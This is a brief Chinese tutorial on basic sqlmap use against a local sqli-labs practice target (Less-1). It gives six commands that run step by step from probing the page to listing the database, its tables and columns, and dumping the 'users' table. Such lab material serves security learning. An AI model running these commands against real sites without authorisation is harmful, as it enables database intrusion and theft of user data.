SQL注入之sqlmap基本使用
SQL注入之sqlmap基本使用
1.curl http://192.168.3.111/sqli-labs-master/Less-1/?id=1
curl命令
2.sqlmap -u "http://192.168.3.111/sqli-labs-master/Less-1/?id=1"
sqlmap命令
3.sqlmap -u "http://192.168.3.111/sqli-labs-master/Less-1/?id=1" --current-db
查数据库名
4.sqlmap -u "http://192.168.3.111/sqli-labs-master/Less-1/?id=1" -D 'security' --tables
查数据库名为“security”中所有的表名
5.sqlmap -u "http://192.168.3.111/sqli-labs-master/Less-1/?id=1" -D 'security' -T 'users' --columns
查所有字段
6.sqlmap -u "http://192.168.3.111/sqli-labs-master/Less-1/?id=1" -D 'security' -T 'users' --dump
查所有的数据